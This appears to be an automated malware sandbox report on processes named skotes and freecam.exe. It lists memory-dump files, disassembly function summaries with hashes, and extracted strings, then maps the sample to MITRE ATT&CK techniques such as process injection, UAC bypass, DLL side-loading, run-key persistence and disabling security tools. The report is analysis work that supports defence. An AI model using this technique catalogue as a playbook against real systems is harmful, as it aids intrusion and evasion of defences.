Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 93610a5d8b5cd58a5b43ee11fa330501590dce45e25158bfa661a5bcde30c53e
Instruction ID: 312a59d10ee56256759a4c9e307e11bf1f35ea7960f57aa7141984672862975a
Opcode Fuzzy Hash: 93610a5d8b5cd58a5b43ee11fa330501590dce45e25158bfa661a5bcde30c53e
Instruction Fuzzy Hash: 66E0923AB402146BCF04F769D849D9DB77D9EC47147048116E925A3291EB70AA45CAD1

Function 009634CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 009634FC

Strings

version, xrefs: 009634E1
pScheduler, xrefs: 009634F4

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: cbf20ebef215f6454bbbc736f1f2a50aee3817822649995a8a547f6d996764ca
Instruction ID: baab90d1b484349844f711e781e2f5c7662af628c5bbf2a3e0364a6e2de11fcd
Opcode Fuzzy Hash: cbf20ebef215f6454bbbc736f1f2a50aee3817822649995a8a547f6d996764ca
Instruction Fuzzy Hash: DBE08634540208B6CF25FA59C84BBDCB768AB94749F04C115F850110E19FB59788DA81

Analysis Process: freecam.exePID: 7588, Parent PID: 3608COMMON

Non-executed Functions

Function 00387F40 Relevance: 12.7, Strings: 10, Instructions: 172COMMON

Download Yara Rule

Strings

runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=the sid shouldn't have following characters: tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtotalAlloc and consistent stats are, xrefs: 003881CC
runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflowtls: unsupported certificate key (%T)t, xrefs: 0038825B
runtime: g0 stack [runtime: heapInUse=runtime: pcdata is runtime: preempt g0runtime: totalFree=sampling period=%dsemaRoot rotateLeftshallow_pan_of_foodskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtemplate: %s:%d: %stext/cache-ma, xrefs: 003880DB
VirtualQuery for stack base failedadding nil Certificate to CertPoolapplication/x-iwork-keynote-sffkeyapplication/x-iwork-keynote-sffkthapplication/x-iwork-pages-sffpagesapplication/x-magic-cap-package-10application/x-vndaudioexplosionmzzbad scalar length: %d,, xrefs: 003881A5
runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=the sid shouldn't have following characters: tls: internal error: failed to update binderstls: internal error: unexpected ren, xrefs: 00388227
bad g0 stackbad recoverybellhop_bellbiking_womanblack-squareblack_circleblacksquare;block clauseblonde_womanbowing_womanboxing_glovebroken_heartbrontosaurusburkina_fasoc ap trafficc hs trafficcall_me_handcaller errorcamera_flashcan't happencapital_abcdcas64 fa, xrefs: 0038814A
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00388171
)*.*/*=+++-+1+=, ,---1-=->.../.\.a.c.f.g.h.m.o.p.s.t.z/*///=/i00010203040506090F0X0b0o0s0x1015181E25303132333435363739404142434445464749536975809091929394959697: :(:):/:::=:D:O:S:]:|; ;)<!<-<<<=<><?=#==="> >=>>?>??A3A4CNCcCfCoCsGTLTLlLmLoLtLuMcMeMnMuNONdNlNo, xrefs: 0038812F
CreateWaitableTimerEx when creating timer failedInt.GobDecode: encoding version %d not supportedMajorSubsystemVersion is outside 3<-->6 boundaryNumber of heap bytes allocated and still in use.Rotate: Cannot find free log number to rename %sSindhi Islamic Repub, xrefs: 00388200
%, xrefs: 00388264

Memory Dump Source

Source File: 00000007.00000002.2665649516.0000000000351000.00000020.00000001.01000000.00000009.sdmp, Offset: 00350000, based on PE: true

Associated: 00000007.00000002.2665541490.0000000000350000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2669978281.0000000000968000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679584157.0000000000F56000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679621739.0000000000F62000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679674390.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679721317.0000000000F98000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679783670.0000000000FBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679821016.0000000000FBF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679858875.0000000000FC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679888950.0000000000FC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679935074.0000000000FC9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679979172.0000000000FCA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680025882.0000000000FCB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680025882.0000000000FD6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680025882.0000000000FF6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680025882.0000000000FFA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680364857.0000000000FFE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680422028.0000000000FFF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680422028.000000000105C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_350000_freecam.jbxd

Similarity

API ID:
String ID: %$)*.*/*=+++-+1+=, ,---1-=->.../.\.a.c.f.g.h.m.o.p.s.t.z/*///=/i00010203040506090F0X0b0o0s0x1015181E25303132333435363739404142434445464749536975809091929394959697: :(:):/:::=:D:O:S:]:|; ;)<!<-<<<=<><?=#==="> >=>>?>??A3A4CNCcCfCoCsGTLTLlLmLoLtLuMcMeMnMuNONdNlNo$CreateWaitableTimerEx when creating timer failedInt.GobDecode: encoding version %d not supportedMajorSubsystemVersion is outside 3<-->6 boundaryNumber of heap bytes allocated and still in use.Rotate: Cannot find free log number to rename %sSindhi Islamic Repub$VirtualQuery for stack base failedadding nil Certificate to CertPoolapplication/x-iwork-keynote-sffkeyapplication/x-iwork-keynote-sffkthapplication/x-iwork-pages-sffpagesapplication/x-magic-cap-package-10application/x-vndaudioexplosionmzzbad scalar length: %d,$bad g0 stackbad recoverybellhop_bellbiking_womanblack-squareblack_circleblacksquare;block clauseblonde_womanbowing_womanboxing_glovebroken_heartbrontosaurusburkina_fasoc ap trafficc hs trafficcall_me_handcaller errorcamera_flashcan't happencapital_abcdcas64 fa$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=the sid shouldn't have following characters: tls: internal error: failed to update binderstls: internal error: unexpected ren$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflowtls: unsupported certificate key (%T)t$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=the sid shouldn't have following characters: tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtotalAlloc and consistent stats are$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: heapInUse=runtime: pcdata is runtime: preempt g0runtime: totalFree=sampling period=%dsemaRoot rotateLeftshallow_pan_of_foodskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtemplate: %s:%d: %stext/cache-ma
API String ID: 0-2764677682
Opcode ID: 93167128e5f4fdca3622928b779bfa7a1d8f240875f7582b718caeb0bd6ddfe5
Instruction ID: 8e7fcd317e416b578389dca421c48fb7423fa5491440c45ca7ae32682540a391
Opcode Fuzzy Hash: 93167128e5f4fdca3622928b779bfa7a1d8f240875f7582b718caeb0bd6ddfe5
Instruction Fuzzy Hash: DF81E0B45087059FD301FF64D089B5ABBE0FF88704F0189ADE4888B392EB78D9498F52

Function 00398790 Relevance: 5.1, Strings: 4, Instructions: 81COMMON

Download Yara Rule

Strings

releasep: m=remote errorrice_crackerrowing_womanruntime: gp=runtime: sp=s ap traffics hs trafficsanfranciscosaudi_arabiaself-preemptsequence endsetupapi.dllshort buffersierra_leonesint_maartensleeping_bedslot_machinesouth_africaspanSetSpinespreadMethodspreadme, xrefs: 00398829
releasep: invalid argruntime: confused by runtime: mappedReady=runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: totalMapped=runtime: work.nwait= sequence tag mismatchset bit is not 0 or 1slightly_smiling_facest_vincent_grenadinesstale NF, xrefs: 003988E1
p->status= s.nelems= schedtick= span.list= timerslen=!!timestamp# Sys = %d%!(BADPREC), elemsize=, npages = , settings:-syncWithWU.WithCancel/debug/vars/dev/stderr/dev/stdout/index.html/robots.txt0123456789_30517578125: frame.sp=; Domain=%s; Max-Age=0> in sp, xrefs: 00398897
m->p= max= min= next= null p->m= prev= span=!!bool!!null#%#x% -10s% -16d% -16s% -50s% util%%%02x%.2fms%.2fns%.2fus%T(%d)%d %s%q: %s%v: %v ' for '"&<>, xrefs: 0039884B

Memory Dump Source

Source File: 00000007.00000002.2665649516.0000000000351000.00000020.00000001.01000000.00000009.sdmp, Offset: 00350000, based on PE: true

Associated: 00000007.00000002.2665541490.0000000000350000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2669978281.0000000000968000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679584157.0000000000F56000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679621739.0000000000F62000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679674390.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679721317.0000000000F98000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679783670.0000000000FBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679821016.0000000000FBF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679858875.0000000000FC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679888950.0000000000FC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679935074.0000000000FC9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2679979172.0000000000FCA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680025882.0000000000FCB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680025882.0000000000FD6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680025882.0000000000FF6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680025882.0000000000FFA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680364857.0000000000FFE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680422028.0000000000FFF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2680422028.000000000105C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_350000_freecam.jbxd

Similarity

API ID:
String ID: m->p= max= min= next= null p->m= prev= span=!!bool!!null#%#x% -10s% -16d% -16s% -50s% util%%%02x%.2fms%.2fns%.2fus%T(%d)%d %s%q: %s%v: %v ' for '"&<>$ p->status= s.nelems= schedtick= span.list= timerslen=!!timestamp# Sys = %d%!(BADPREC), elemsize=, npages = , settings:-syncWithWU.WithCancel/debug/vars/dev/stderr/dev/stdout/index.html/robots.txt0123456789_30517578125: frame.sp=; Domain=%s; Max-Age=0> in sp$releasep: invalid argruntime: confused by runtime: mappedReady=runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: totalMapped=runtime: work.nwait= sequence tag mismatchset bit is not 0 or 1slightly_smiling_facest_vincent_grenadinesstale NF$releasep: m=remote errorrice_crackerrowing_womanruntime: gp=runtime: sp=s ap traffics hs trafficsanfranciscosaudi_arabiaself-preemptsequence endsetupapi.dllshort buffersierra_leonesint_maartensleeping_bedslot_machinesouth_africaspanSetSpinespreadMethodspreadme
API String ID: 0-1623563676
Opcode ID: 92178a5df553c0e1ce2f2e389a132242955cf81ba3551c9ffe1f92eab76b8fb4
Instruction ID: 4e5c6a70007c613fc14cb0561481fe08544a3894c75be0579a7d709bd420eb53
Opcode Fuzzy Hash: 92178a5df553c0e1ce2f2e389a132242955cf81ba3551c9ffe1f92eab76b8fb4
Instruction Fuzzy Hash: A431EFB45087058FC705EF64C185B1ABBE0FF88704F1588ADE4888B392DB79D989DB62

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

